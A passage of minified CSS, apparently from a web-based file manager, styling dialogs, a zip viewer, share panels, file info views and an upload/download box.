0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info 